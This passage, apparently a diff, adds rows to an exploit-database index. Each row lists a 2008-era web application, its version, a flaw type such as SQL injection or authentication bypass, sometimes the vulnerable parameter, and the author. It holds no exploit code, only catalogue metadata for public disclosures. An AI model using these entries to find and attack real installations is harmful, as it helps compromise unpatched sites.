+7022,exploits/php/webapps/7022.txt,"LoveCMS 1.6.2 Final - Arbitrary File Delete",2008-11-06,cOndemned,webapps,php, +7023,exploits/php/webapps/7023.txt,"DELTAScripts PHP Classifieds 7.5 - Authentication Bypass",2008-11-06,ZoRLu,webapps,php, +7024,exploits/php/webapps/7024.txt,"DELTAScripts PHP Links 1.3 - Authentication Bypass",2008-11-06,ZoRLu,webapps,php, +7025,exploits/php/webapps/7025.txt,"DELTAScripts PHP Shop 1.0 - Authentication Bypass",2008-11-06,ZoRLu,webapps,php, +7026,exploits/php/webapps/7026.txt,"SoftComplex PHP Image Gallery - 'ctg' SQL Injection",2008-11-06,"Hussin X",webapps,php, +7027,exploits/php/webapps/7027.txt,"Prozilla Software Directory - Cross-Site Scripting / SQL Injection",2008-11-06,G4N0K,webapps,php, +7028,exploits/php/webapps/7028.txt,"TurnkeyForms Entertainment Portal 2.0 - Insecure Cookie Handling",2008-11-07,G4N0K,webapps,php, +7029,exploits/php/webapps/7029.txt,"TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection",2008-11-07,G4N0K,webapps,php, +7030,exploits/php/webapps/7030.txt,"Mole Group Pizza - 'manufacturers_id' SQL Injection",2008-11-07,InjEctOr5,webapps,php, +7031,exploits/php/webapps/7031.php,"e-Vision CMS 2.0.2 - Multiple Local File Inclusions",2008-11-07,StAkeR,webapps,php, +7032,exploits/php/webapps/7032.txt,"U&M Software Signup 1.1 - Authentication Bypass",2008-11-07,G4N0K,webapps,php, +7033,exploits/php/webapps/7033.txt,"U&M Software JustBookIt 1.0 - Authentication Bypass",2008-11-07,G4N0K,webapps,php, +7034,exploits/php/webapps/7034.txt,"U&M Software Event Lister 1.0 - Authentication Bypass",2008-11-07,G4N0K,webapps,php, +7035,exploits/php/webapps/7035.txt,"TurnkeyForms Local Classifieds - Cross-Site Scripting / SQL Injection",2008-11-07,TR-ShaRk,webapps,php, +7038,exploits/php/webapps/7038.txt,"Joomla! Component ClickHeat 1.0.1 - Multiple Remote File Inclusions",2008-11-07,NoGe,webapps,php, +7039,exploits/php/webapps/7039.txt,"Joomla! Component Recly!Competitions 1.0.0 - Multiple Remote File Inclusions",2008-11-07,NoGe,webapps,php, +7040,exploits/php/webapps/7040.txt,"Joomla! Component Feederator 1.0.5 - Multiple Remote File Inclusions",2008-11-07,NoGe,webapps,php, +7041,exploits/php/webapps/7041.txt,"E-topbiz Online Store 1 - Authentication Bypass",2008-11-07,ZoRLu,webapps,php, +7042,exploits/php/webapps/7042.txt,"PHP Auto Listings Script - Authentication Bypass",2008-11-07,r45c4l,webapps,php, +7043,exploits/php/webapps/7043.txt,"Mole Group Rental Script - Authentication Bypass",2008-11-07,Cyber-Zone,webapps,php, +7044,exploits/php/webapps/7044.txt,"MyioSoft Ajax Portal 3.0 - Authentication Bypass",2008-11-07,ZoRLu,webapps,php, +7045,exploits/php/webapps/7045.txt,"MyioSoft EasyBookMarker 4.0 - Authentication Bypass",2008-11-07,ZoRLu,webapps,php, +7046,exploits/php/webapps/7046.txt,"MyioSoft EasyCalendar - Authentication Bypass",2008-11-07,ZoRLu,webapps,php, +7047,exploits/php/webapps/7047.txt,"DELTAScripts PHP Classifieds 7.5 - SQL Injection",2008-11-07,ZoRLu,webapps,php, +7048,exploits/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' SQL Injection",2008-11-07,Stack,webapps,php, +7049,exploits/php/webapps/7049.txt,"Mini Web Calendar 1.2 - File Disclosure / Cross-Site Scripting",2008-11-07,ahmadbady,webapps,php, +7050,exploits/php/webapps/7050.txt,"E-topbiz Number Links 1 - 'id' SQL Injection",2008-11-07,"Hussin X",webapps,php, +7052,exploits/php/webapps/7052.txt,"Domain Seller Pro 1.5 - 'id' SQL Injection",2008-11-07,TR-ShaRk,webapps,php, +7053,exploits/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - 'Parent' SQL Injection",2008-11-07,G4N0K,webapps,php, +7057,exploits/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution",2008-11-08,Ams,webapps,php, +7058,exploits/php/webapps/7058.txt,"zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting",2008-11-08,ZoRLu,webapps,php, +7059,exploits/php/webapps/7059.txt,"Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion",2008-11-08,BugReport.IR,webapps,php, +7061,exploits/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass",2008-11-08,d3b4g,webapps,php, +7062,exploits/php/webapps/7062.txt,"Zeeways ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,webapps,php, +7063,exploits/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,webapps,php, +7064,exploits/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Blind SQL Injection",2008-11-08,boom3rang,webapps,php, +7065,exploits/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Local File Inclusion",2008-11-08,dun,webapps,php, +7066,exploits/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass (1)",2008-11-08,G4N0K,webapps,php, +7067,exploits/asp/webapps/7067.txt,"DigiAffiliate 1.4 - Authentication Bypass",2008-11-08,d3b4g,webapps,asp, +7068,exploits/php/webapps/7068.txt,"Mole Group Airline Ticket Script - Authentication Bypass",2008-11-08,Cyber-Zone,webapps,php, +7069,exploits/php/webapps/7069.txt,"V3 Chat Live Support 3.0.4 - Insecure Cookie Handling",2008-11-08,Cyber-Zone,webapps,php, +7070,exploits/php/webapps/7070.txt,"Zeeways PHOTOVIDEOTUBE 1.1 - Authentication Bypass",2008-11-08,Stack,webapps,php, +7071,exploits/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final - Authentication Bypass",2008-11-09,Cyber-Zone,webapps,php, +7072,exploits/php/webapps/7072.txt,"ZEEMATRI 3.0 - 'adid' SQL Injection",2008-11-09,"Hussin X",webapps,php, +7074,exploits/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,webapps,php, +7075,exploits/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - Authentication Bypass / SQL Injection / Cross-Site Scripting",2008-11-09,"Andreas Kurtz",webapps,jsp, +7076,exploits/php/webapps/7076.txt,"Collabtive 0.4.8 - Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload",2008-11-10,USH,webapps,php, +7077,exploits/php/webapps/7077.txt,"OTManager CMS 2.4 - 'Tipo' Remote File Inclusion",2008-11-10,Colt7r,webapps,php, +7078,exploits/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection",2008-11-10,boom3rang,webapps,php, +7079,exploits/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,webapps,php, +7080,exploits/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,webapps,php, +7081,exploits/php/webapps/7081.txt,"AJ Article 1.0 - Remote Authentication Bypass",2008-11-10,G4N0K,webapps,php, +7082,exploits/php/webapps/7082.txt,"PHPStore Car Dealers - Arbitrary File Upload",2008-11-10,ZoRLu,webapps,php, +7083,exploits/php/webapps/7083.txt,"PHPStore PHP Job Search Script - Arbitrary File Upload",2008-11-10,ZoRLu,webapps,php, +7084,exploits/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - Arbitrary File Upload",2008-11-10,ZoRLu,webapps,php, +7085,exploits/php/webapps/7085.txt,"PHPStore Real Estate - Arbitrary File Upload",2008-11-10,ZoRLu,webapps,php, +7086,exploits/php/webapps/7086.txt,"AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities",2008-11-10,G4N0K,webapps,php, +7087,exploits/php/webapps/7087.txt,"AJ Auction - Authentication Bypass",2008-11-10,G4N0K,webapps,php, +7089,exploits/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,webapps,php, +7092,exploits/php/webapps/7092.txt,"Joomla! Component com_books - 'book_id' SQL Injection",2008-11-11,boom3rang,webapps,php, +7093,exploits/php/webapps/7093.txt,"Joomla! Component Contact Info 1.0 - SQL Injection",2008-11-11,boom3rang,webapps,php, +7094,exploits/php/webapps/7094.txt,"Pre Real Estate Listings - Arbitrary File Upload",2008-11-11,BackDoor,webapps,php, +7095,exploits/php/webapps/7095.txt,"Joomla! / Mambo Component com_catalogproduction - 'id' SQL Injection",2008-11-11,boom3rang,webapps,php, +7096,exploits/php/webapps/7096.txt,"Joomla! Component Simple RSS Reader 1.0 - Remote File Inclusion",2008-11-11,NoGe,webapps,php, +7097,exploits/php/webapps/7097.txt,"Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection",2008-11-11,TR-ShaRk,webapps,php, +7098,exploits/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",webapps,php, +7101,exploits/php/webapps/7101.txt,"Alstrasoft SendIt Pro - Arbitrary File Upload",2008-11-12,ZoRLu,webapps,php, +7102,exploits/php/webapps/7102.txt,"Alstrasoft Article Manager Pro 1.6 - Authentication Bypass",2008-11-12,ZoRLu,webapps,php, +7103,exploits/php/webapps/7103.txt,"Alstrasoft Web Host Directory - Authentication Bypass",2008-11-12,ZoRLu,webapps,php, +7105,exploits/php/webapps/7105.txt,"Quick Poll Script - 'id' SQL Injection",2008-11-12,"Hussin X",webapps,php, +7106,exploits/php/webapps/7106.txt,"TurnkeyForms Local Classifieds - Authentication Bypass",2008-11-12,G4N0K,webapps,php, +7107,exploits/php/webapps/7107.txt,"TurnkeyForms Web Hosting Directory - Multiple Vulnerabilities",2008-11-12,G4N0K,webapps,php, +7110,exploits/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php, +7111,exploits/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php, +7112,exploits/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php, +7113,exploits/php/webapps/7113.txt,"BandSite CMS 1.1.4 - Insecure Cookie Handling",2008-11-13,Stack,webapps,php, +7114,exploits/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection / Code Execution",2008-11-13,Ams,webapps,php, +7116,exploits/php/webapps/7116.txt,"Alstrasoft Web Host Directory 1.2 - Multiple Vulnerabilities",2008-11-14,G4N0K,webapps,php, +7117,exploits/php/webapps/7117.txt,"GS Real Estate Portal US/International Module - Multiple Vulnerabilities",2008-11-14,ZoRLu,webapps,php, +7118,exploits/php/webapps/7118.txt,"TurnkeyForms - Text Link Sales Authentication Bypass",2008-11-14,G4N0K,webapps,php, +7119,exploits/php/webapps/7119.php,"Discuz! 6.x/7.x - Remote Code Execution",2008-11-14,80vul,webapps,php, +7120,exploits/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - Authentication Bypass",2008-11-14,R3d-D3V!L,webapps,asp, +7121,exploits/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,webapps,php, +7122,exploits/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,webapps,php, +7123,exploits/php/webapps/7123.txt,"X7 Chat 2.0.5 - Authentication Bypass",2008-11-14,ZoRLu,webapps,php, +7124,exploits/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,webapps,php, +7128,exploits/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' SQL Injection",2008-11-15,snakespc,webapps,php, +7130,exploits/php/webapps/7130.php,"Minigal b13 - Remote File Disclosure",2008-11-15,"Alfons Luja",webapps,php, +7131,exploits/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,webapps,php, +7133,exploits/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injections",2008-11-16,Vrs-hCk,webapps,php, +7134,exploits/php/webapps/7134.txt,"PHPstore Wholesale - 'id' SQL Injection",2008-11-16,"Hussin X",webapps,php, +7136,exploits/php/webapps/7136.txt,"mxCamArchive 2.2 - Bypass Configuration Download",2008-11-17,ahmadbady,webapps,php, +7137,exploits/asp/webapps/7137.txt,"OpenASP 3.0 - Blind SQL Injection",2008-11-17,StAkeR,webapps,asp, +7138,exploits/php/webapps/7138.txt,"E-topbiz ADManager 4 - 'group' Blind SQL Injection",2008-11-17,"Hussin X",webapps,php, +7140,exploits/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve",2008-11-17,cOndemned,webapps,php, +7141,exploits/asp/webapps/7141.txt,"Q-Shop 3.0 - Cross-Site Scripting / SQL Injection",2008-11-17,Bl@ckbe@rD,webapps,asp, +7143,exploits/php/webapps/7143.txt,"PHPfan 3.3.4 - 'init.php' Remote File Inclusion",2008-11-17,ahmadbady,webapps,php, +7144,exploits/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Blind SQL Injection",2008-11-17,ZoRLu,webapps,php, +7146,exploits/php/webapps/7146.txt,"Simple Customer 1.2 - Authentication Bypass",2008-11-17,d3b4g,webapps,php, +7147,exploits/php/webapps/7147.txt,"SaturnCMS - Blind SQL Injection",2008-11-17,"Hussin X",webapps,php, +7148,exploits/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' SQL Injection",2008-11-17,eek,webapps,php, +7149,exploits/php/webapps/7149.php,"VideoScript 4.0.1.50 - Change Admin Password",2008-11-17,G4N0K,webapps,php, +7152,exploits/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,webapps,php, +7153,exploits/php/webapps/7153.txt,"Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Local File Inclusion",2008-11-18,DSecRG,webapps,php, +7155,exploits/php/webapps/7155.txt,"Free Directory Script 1.1.1 - 'API_HOME_DIR' Remote File Inclusion",2008-11-18,"Ghost Hacker",webapps,php, +7156,exploits/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,webapps,php, +7157,exploits/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Arbitrary File Upload",2008-11-19,Batter,webapps,php, +7158,exploits/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - 'FCKeditor' Arbitrary File Upload",2008-11-19,Batter,webapps,php, +7159,exploits/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple Local File Inclusions",2008-11-19,StAkeR,webapps,php, +7160,exploits/php/webapps/7160.php,"MyTopix 1.3.0 - SQL Injection",2008-11-19,cOndemned,webapps,php, +7162,exploits/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,webapps,php, +7163,exploits/php/webapps/7163.txt,"RevSense 1.0 - Authentication Bypass",2008-11-19,d3b4g,webapps,php, +7164,exploits/php/webapps/7164.txt,"Pre Job Board - Authentication Bypass",2008-11-19,R3d-D3V!L,webapps,php, +7165,exploits/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,webapps,php, +7166,exploits/php/webapps/7166.txt,"AskPert - Authentication Bypass",2008-11-19,TR-ShaRk,webapps,php, +7168,exploits/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,webapps,php, +7170,exploits/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing",2008-11-20,G4N0K,webapps,php, +7172,exploits/php/webapps/7172.txt,"Natterchat 1.1 - Authentication Bypass",2008-11-20,Bl@ckbe@rD,webapps,php, +7173,exploits/php/webapps/7173.php,"PHP-Fusion 7.00.1 - 'messages.php' SQL Injection",2008-11-20,irk4z,webapps,php, +7174,exploits/php/webapps/7174.txt,"vBulletin 3.7.3 - Visitor Message Cross-Site Request Forgery / Worm",2008-11-20,Mx,webapps,php, +7175,exploits/php/webapps/7175.txt,"Natterchat 1.12 - Authentication Bypass",2008-11-20,Stack,webapps,php, +7176,exploits/php/webapps/7176.txt,"ToursManager - 'tourview.php' Blind SQL Injection",2008-11-20,XaDoS,webapps,php, +7179,exploits/php/webapps/7179.txt,"Natterchat 1.1 - Remote Authentication Bypass",2008-11-20,Stack,webapps,php, +7180,exploits/php/webapps/7180.txt,"VCalendar - Remote Database Disclosure",2008-11-20,Swan,webapps,php, +7182,exploits/php/webapps/7182.txt,"Joomla! Component Thyme 1.0 - SQL Injection",2008-11-21,"Ded MustD!e",webapps,php, +7184,exploits/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' SQL Injection",2008-11-22,NoGe,webapps,php, +7185,exploits/php/webapps/7185.php,"Discuz! - Remote Reset User Password",2008-11-22,80vul,webapps,php, +7186,exploits/php/webapps/7186.txt,"Vlog System 1.1 - SQL Injection",2008-11-22,Mr.SQL,webapps,php, +7188,exploits/php/webapps/7188.txt,"getaphpsite Real Estate - Arbitrary File Upload",2008-11-22,ZoRLu,webapps,php, +7189,exploits/php/webapps/7189.txt,"getaphpsite Auto Dealers - Arbitrary File Upload",2008-11-22,ZoRLu,webapps,php, +7190,exploits/php/webapps/7190.txt,"Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,webapps,php, +7191,exploits/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password",2008-11-22,cOndemned,webapps,php, +7195,exploits/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' SQL Injection",2008-11-23,snakespc,webapps,php, +7197,exploits/php/webapps/7197.txt,"Goople CMS 1.7 - Arbitrary File Upload",2008-11-23,x0r,webapps,php, +7198,exploits/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - SQL Injection",2008-11-23,snakespc,webapps,php, +7199,exploits/php/webapps/7199.txt,"Netartmedia Blog System - SQL Injection",2008-11-23,snakespc,webapps,php, +7200,exploits/php/webapps/7200.txt,"PG Real Estate - Authentication Bypass",2008-11-23,ZoRLu,webapps,php, +7201,exploits/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - Authentication Bypass",2008-11-23,ZoRLu,webapps,php, +7202,exploits/php/webapps/7202.txt,"PG Job Site - Blind SQL Injection",2008-11-23,ZoRLu,webapps,php, +7204,exploits/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting",2008-11-23,RoMaNcYxHaCkEr,webapps,php, +7205,exploits/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,webapps,php, +7206,exploits/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,webapps,php, +7208,exploits/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - 'ad_id' SQL Injection",2008-11-24,"Hussin X",webapps,php, +7210,exploits/php/webapps/7210.txt,"Goople CMS 1.7 - Arbitrary Code Execution",2008-11-24,x0r,webapps,php, +7211,exploits/php/webapps/7211.php,"VideoScript 3.0 < 4.0.1.50 - 'Official' Shell Injection",2008-11-24,G4N0K,webapps,php, +7212,exploits/php/webapps/7212.php,"VideoScript 3.0 < 4.1.5.55 - 'Unofficial' Shell Injection",2008-11-24,G4N0K,webapps,php, +7214,exploits/php/webapps/7214.txt,"ftpzik - Cross-Site Scripting / Local File Inclusion",2008-11-24,JIKO,webapps,php, +7215,exploits/php/webapps/7215.txt,"Bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,webapps,php, +7216,exploits/php/webapps/7216.txt,"WebStudio CMS - Blind SQL Injection",2008-11-24,"Glafkos Charalambous",webapps,php, +7217,exploits/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution",2008-11-24,girex,webapps,php, +7218,exploits/php/webapps/7218.txt,"Nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,webapps,php, +7221,exploits/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusions",2008-11-24,NoGe,webapps,php, +7222,exploits/php/webapps/7222.txt,"WebStudio eHotel - Blind SQL Injection",2008-11-25,"Hussin X",webapps,php, +7223,exploits/php/webapps/7223.txt,"WebStudio eCatalogue - Blind SQL Injection",2008-11-25,"Hussin X",webapps,php, +7224,exploits/php/webapps/7224.txt,"FAQ Manager 1.2 - 'categorie.php' SQL Injection",2008-11-25,cOndemned,webapps,php, +7225,exploits/php/webapps/7225.txt,"Pie Web m{a_e}sher mod rss 0.1 - Remote File Inclusion",2008-11-25,ZoRLu,webapps,php, +7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php, +7228,exploits/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php, +7229,exploits/php/webapps/7229.txt,"FAQ Manager 1.2 - 'header.php' Remote File Inclusion",2008-11-25,ZoRLu,webapps,php, +7230,exploits/php/webapps/7230.pl,"Clean CMS 1.5 - Blind SQL Injection",2008-11-25,JosS,webapps,php, +7231,exploits/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion",2008-11-25,"Alfons Luja",webapps,php, +7232,exploits/php/webapps/7232.txt,"SimpleBlog 3.0 - Database Disclosure",2008-11-25,EL_MuHaMMeD,webapps,php, +7233,exploits/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - Arbitrary File Upload",2008-11-25,cOndemned,webapps,php, +7234,exploits/php/webapps/7234.txt,"VideoGirls BiZ - Blind SQL Injection",2008-11-25,Cyber-Zone,webapps,php, +7235,exploits/php/webapps/7235.txt,"Jamit Job Board 3.x - Blind SQL Injection",2008-11-25,XaDoS,webapps,php, +40987,exploits/php/webapps/40987.txt,"My Click Counter 1.0 - Authentication Bypass",2017-01-03,Adam,webapps,php, +7237,exploits/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,webapps,php, +7238,exploits/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Blind SQL Injection",2008-11-26,XaDoS,webapps,php, +7239,exploits/php/webapps/7239.txt,"ParsBlogger - 'blog.asp' SQL Injection",2008-11-26,"BorN To K!LL",webapps,php, +7240,exploits/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,webapps,php, +7241,exploits/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - Local File Inclusion",2008-11-27,"CWH Underground",webapps,php, +7242,exploits/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,webapps,php, +7243,exploits/php/webapps/7243.php,"Star Articles 6.0 - Blind SQL Injection (2)",2008-11-27,Stack,webapps,php, +7244,exploits/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure",2008-11-27,Pouya_Server,webapps,php, +7245,exploits/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,webapps,php, +7246,exploits/php/webapps/7246.txt,"Ocean12 Poll Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,webapps,php, +7247,exploits/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold - Database Disclosure",2008-11-27,Pouya_Server,webapps,php, +7248,exploits/php/webapps/7248.txt,"Family Project 2.x - Authentication Bypass",2008-11-27,The_5p3ctrum,webapps,php, +7250,exploits/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - SQL Injection",2008-11-27,XaDoS,webapps,php, +7251,exploits/php/webapps/7251.txt,"Star Articles 6.0 - Arbitrary File Upload",2008-11-27,ZoRLu,webapps,php, +7252,exploits/php/webapps/7252.txt,"Web Calendar 4.1 - Authentication Bypass",2008-11-27,Cyber-Zone,webapps,php, +7253,exploits/php/webapps/7253.txt,"Booking Centre 2.01 - 'HotelID' SQL Injection",2008-11-27,R3d-D3V!L,webapps,php, +7254,exploits/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - Authentication Bypass",2008-11-27,Cyber-Zone,webapps,php, +7255,exploits/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,webapps,php, +7256,exploits/php/webapps/7256.txt,"Turnkey Arcade Script - SQL Injection (1)",2008-11-27,The_5p3ctrum,webapps,php, +7258,exploits/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro - Database Disclosure",2008-11-27,Stack,webapps,php, +7259,exploits/asp/webapps/7259.txt,"Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting",2008-11-27,Bl@ckbe@rD,webapps,asp, +7260,exploits/php/webapps/7260.txt,"Basic-CMS - Remote Database Disclosure",2008-11-28,Stack,webapps,php, +7261,exploits/php/webapps/7261.txt,"Basic-CMS - Blind SQL Injection",2008-11-28,"CWH Underground",webapps,php, +7263,exploits/php/webapps/7263.txt,"Booking Centre 2.01 - Authentication Bypass",2008-11-28,MrDoug,webapps,php, +7265,exploits/php/webapps/7265.txt,"Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection",2008-11-28,Bl@ckbe@rD,webapps,php, +7266,exploits/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Configuration Retrieve",2008-11-28,StAkeR,webapps,php, +7267,exploits/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,webapps,php, +7268,exploits/php/webapps/7268.txt,"Bluo CMS 1.2 - Blind SQL Injection",2008-11-28,The_5p3ctrum,webapps,php, +7269,exploits/php/webapps/7269.pl,"CMS little 0.0.1 - 'term' SQL Injection",2008-11-28,"CWH Underground",webapps,php, +7270,exploits/php/webapps/7270.txt,"ReVou Twitter Clone - Authentication Bypass",2008-11-28,R3d-D3V!L,webapps,php, +7271,exploits/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro - 'ID' Blind SQL Injection",2008-11-28,Stack,webapps,php, +7273,exploits/asp/webapps/7273.txt,"Active Force Matrix 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,webapps,asp, +7274,exploits/asp/webapps/7274.txt,"ASPReferral 5.3 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,webapps,asp, +7275,exploits/asp/webapps/7275.txt,"ActiveVotes 2.2 - Authentication Bypass",2008-11-29,R3d-D3V!L,webapps,asp, +7276,exploits/asp/webapps/7276.txt,"Active Test 2.1 - Authentication Bypass",2008-11-29,R3d-D3V!L,webapps,asp, +7277,exploits/asp/webapps/7277.txt,"Active Websurvey 9.1 - Authentication Bypass",2008-11-29,R3d-D3V!L,webapps,asp, +7278,exploits/asp/webapps/7278.txt,"Active Membership 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,webapps,asp, +7279,exploits/asp/webapps/7279.txt,"eWebquiz 8 - Authentication Bypass",2008-11-29,R3d-D3V!L,webapps,asp, +7280,exploits/asp/webapps/7280.txt,"Active NewsLetter 4.3 - Authentication Bypass",2008-11-29,R3d-D3V!L,webapps,asp, +7281,exploits/asp/webapps/7281.txt,"Active Web Mail 4 - Authentication Bypass",2008-11-29,R3d-D3V!L,webapps,asp, +7282,exploits/asp/webapps/7282.txt,"Active Trade 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,webapps,asp, +7283,exploits/asp/webapps/7283.txt,"Active Price Comparison 4 - Authentication Bypass",2008-11-29,R3d-D3V!L,webapps,asp, +7284,exploits/php/webapps/7284.txt,"PHP TV Portal 2.0 - 'mid' SQL Injection",2008-11-29,Cyber-Zone,webapps,php, +7285,exploits/php/webapps/7285.txt,"CMS Made Simple 1.4.1 - Local File Inclusion",2008-11-29,M4ck-h@cK,webapps,php, +7286,exploits/php/webapps/7286.txt,"OraMon 2.0.1 - Remote Configuration File Disclosure",2008-11-29,ahmadbady,webapps,php, +7287,exploits/asp/webapps/7287.txt,"ActiveVotes 2.2 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,webapps,asp, +7288,exploits/asp/webapps/7288.txt,"Active Web Mail 4 - Blind SQL Injection",2008-11-29,R3d-D3V!L,webapps,asp, +7289,exploits/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Blind SQL Injection",2008-11-30,R3d-D3V!L,webapps,php, +7290,exploits/php/webapps/7290.txt,"Active Bids 3.5 - 'itemID' Blind SQL Injection",2008-11-29,Stack,webapps,php, +7291,exploits/php/webapps/7291.pl,"OpenForum 0.66 Beta - Remote Reset Admin Password",2008-11-29,"CWH Underground",webapps,php, +7292,exploits/asp/webapps/7292.txt,"ASPThai.Net Forum 8.5 - Remote Database Disclosure",2008-11-29,"CWH Underground",webapps,asp, +7293,exploits/asp/webapps/7293.txt,"Active Web Helpdesk 2 - Authentication Bypass",2008-11-29,Cyber-Zone,webapps,asp, +7294,exploits/php/webapps/7294.pl,"Lito Lite CMS - 'cid' SQL Injection",2008-11-29,"CWH Underground",webapps,php, +7295,exploits/asp/webapps/7295.txt,"Active Test 2.1 - 'QuizID' Blind SQL Injection",2008-11-29,R3d-D3V!L,webapps,asp, +7298,exploits/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection",2008-11-30,Cyber-Zone,webapps,php, +7299,exploits/php/webapps/7299.txt,"Active Photo Gallery 6.2 - Authentication 